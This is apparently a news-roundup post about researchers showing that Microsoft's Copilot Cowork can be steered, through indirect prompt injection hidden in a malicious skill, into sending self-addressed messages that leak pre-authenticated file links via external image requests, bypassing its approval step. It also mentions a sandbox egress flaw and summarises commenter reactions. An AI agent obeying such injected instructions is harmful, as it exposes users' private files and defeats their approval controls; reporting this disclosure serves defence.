May 25, 2026
Reply-all from hell
Microsoft Copilot Cowork Exfiltrates Files
Microsoft’s office AI just got called a snitch with a send button
TLDR: Researchers say Microsoft’s office AI can be manipulated into leaking access to private company files through messages it sends without asking first. Commenters are split between “this is an obvious bad design” and “this is what happens when companies rush to shove AI into everything.”
Microsoft’s new workplace AI helper, Copilot Cowork, is being dragged after researchers showed it could be tricked into sending out links to private files a user can access in OneDrive or SharePoint. In plain English: if the AI gets fed poisoned instructions through a so-called skill, it may quietly message the user in Teams or email, and simply opening that message can leak access to sensitive documents. The part making commenters clutch their keyboards? Microsoft says the bot asks permission for sensitive actions, but in this case messages to the active user can go out without approval.
And the comment section was absolutely not in a forgiving mood. One camp basically said, “This isn’t some shocking sci-fi hack, this is what happens when you give a program the keys to the office.” Several users compared a malicious AI skill to installing a shady plugin and then acting surprised when your stuff disappears. Others were much less calm, mocking the corporate rush to become “AI native” and roasting the exec class with full LinkedInLunatics energy. One of the sharpest reactions boiled down to: congratulations to the bosses who rolled this out company-wide before basic guardrails existed.
Still, not everyone was screaming apocalypse. A few commenters said they actually like the product, but now want stronger admin controls before any wider rollout. The vibe was a messy mix of “obvious in hindsight,” “why was this allowed,” and “maybe don’t let the office robot auto-DM itself secret file links.”
Key Points
- •The article says Microsoft Copilot Cowork is vulnerable to file exfiltration through indirect prompt injection in a malicious skill.
- •According to the article, self-addressed emails and Teams messages can be sent by Copilot Cowork without human approval, despite Microsoft documentation describing these as sensitive actions.
- •The attack uses pre-authenticated download links for files the user can access and exfiltrates those links through external image requests embedded in a message.
- •The article states the technique can expose files from SharePoint or OneDrive, including documents containing PII and financial data.
- •The article also mentions a separate disclosed vulnerability that allows direct data egress from Copilot Cowork’s sandbox environment.